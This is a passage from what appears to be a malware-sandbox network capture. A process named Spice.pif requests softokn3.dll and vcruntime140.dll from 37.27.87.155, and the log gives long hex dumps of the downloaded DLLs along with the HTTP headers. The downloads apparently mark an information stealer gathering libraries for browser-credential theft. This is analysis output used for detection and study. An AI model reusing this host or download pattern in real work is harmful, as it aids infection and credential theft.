2024-04-30 05:44:21 UTC	16136	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
2024-04-30 05:44:21 UTC	16384	IN	Data Raw: 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a e9 51 fe ff ff c7 41 14 0b 00 00 00 8b 51 18 Data Ascii: i)ff f@U \|AAIQQAEq@AfAAi)\f fR \|9U\|&AVQ\|A@fAfAA1<MAQAQ
2024-04-30 05:44:21 UTC	16384	IN	Data Raw: 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45 08 8b 80 a0 00 00 00 83 e0 0c 83 f8 08 0f 85 Data Ascii: ti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`\|$\tD$euL$PhD$TD$E
2024-04-30 05:44:21 UTC	16384	IN	Data Raw: 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10 8b 0d 48 11 1e 10 89 ca 09 c2 0f 84 b1 fe ff Data Ascii: w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SLH
2024-04-30 05:44:21 UTC	16384	IN	Data Raw: 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd 1b 10 68 78 fc 1b 10 6a 0e e8 0a 8f 02 00 83 Data Ascii: $pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hhhxj
2024-04-30 05:44:21 UTC	16384	IN	Data Raw: 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3 b2 00 00 8b 45 08 ff 70 1c 68 20 85 1c 10 eb Data Ascii: o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$hEph
2024-04-30 05:44:21 UTC	16384	IN	Data Raw: 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b 5c 24 18 89 d8 83 c0 04 68 fc 01 00 00 6a 00 Data Ascii: h\|D$Fh\|$urVd@\|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$\|$D$pdD$H<@D>D$1V>D$>D$>D$\$hj
2024-04-30 05:44:21 UTC	16384	IN	Data Raw: 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d ff ff ff 8b 10 8b 4d e8 83 c4 10 5e 5f 5b 5d Data Ascii: HukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-MmM^_[]
2024-04-30 05:44:21 UTC	16384	IN	Data Raw: f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff 01 74 09 85 ff 75 0a e9 69 03 00 00 c6 44 02 Data Ascii: WtL$ u\|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$RttuiD
2024-04-30 05:44:21 UTC	16384	IN	Data Raw: c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18 00 00 00 00 e9 36 f8 ff ff 8b 40 14 e9 d1 e9 Data Ascii: D$$D$@@L$;A<\|$7h't$D$$hH\|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$6@

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.8	49723	37.27.87.155	443	752	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

Timestamp	Bytes transferred	Direction	Data
2024-04-30 05:44:23 UTC	157	OUT	GET /softokn3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 37.27.87.155 Cache-Control: no-cache
2024-04-30 05:44:23 UTC	246	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 30 Apr 2024 05:44:23 GMT Content-Type: application/octet-stream Content-Length: 257872 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-3ef50" Accept-Ranges: bytes
2024-04-30 05:44:23 UTC	16138	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
2024-04-30 05:44:23 UTC	16384	IN	Data Raw: ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89 f0 81 c4 08 01 00 00 5e 5f 5b 5d c3 8b 5d 0c c7 Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP\|*USWV1E0=(tM1(^_[]]
2024-04-30 05:44:24 UTC	16384	IN	Data Raw: ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8 bf 4d 02 00 83 c4 04 a3 38 9a 03 10 ff 75 0c e8 Data Ascii: kWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGPM8u
2024-04-30 05:44:24 UTC	16384	IN	Data Raw: 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00 00 00 ba 01 e0 01 e0 33 11 be 01 f1 01 f1 33 71 Data Ascii: AAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q33q
2024-04-30 05:44:24 UTC	16384	IN	Data Raw: 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23 02 00 00 3d 21 40 00 00 0f 85 37 06 00 00 83 7c Data Ascii: !=P=Qt-=Rt=UG{{G\|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#=!@7\|
2024-04-30 05:44:24 UTC	16384	IN	Data Raw: 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00 00 74 8a eb 18 83 c7 60 8b 07 89 01 31 db e9 7a Data Ascii: 1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=Pt`1z
2024-04-30 05:44:24 UTC	16384	IN	Data Raw: d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00 83 c4 04 56 e8 78 4d 01 00 83 c4 04 83 fb 40 bf Data Ascii: EGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$\|tu}Z=}]WM}EPVWSut&uGZVxM@
2024-04-30 05:44:24 UTC	16384	IN	Data Raw: 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 ba 83 01 00 00 0f a3 f2 73 Data Ascii: H8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.s
2024-04-30 05:44:24 UTC	16384	IN	Data Raw: cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15 10 7c 03 10 83 c4 04 83 7e 0c 00 0f 88 8b 02 00 Data Ascii: USWVu@$xTv4{F4^@KN@P\|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4\|~
2024-04-30 05:44:24 UTC	16384	IN	Data Raw: 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 8b 18 85 f6 75 a1 8b 4b 14 ff 15 00 a0 03 10 ff Data Ascii: <^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%uK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.8	49724	37.27.87.155	443	752	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

Timestamp	Bytes transferred	Direction	Data
2024-04-30 05:44:25 UTC	161	OUT	GET /vcruntime140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 37.27.87.155 Cache-Control: no-cache
2024-04-30 05:44:25 UTC	245	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 30 Apr 2024 05:44:25 GMT Content-Type: application/octet-stream Content-Length: 80880 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-13bf0" Accept-Ranges: bytes
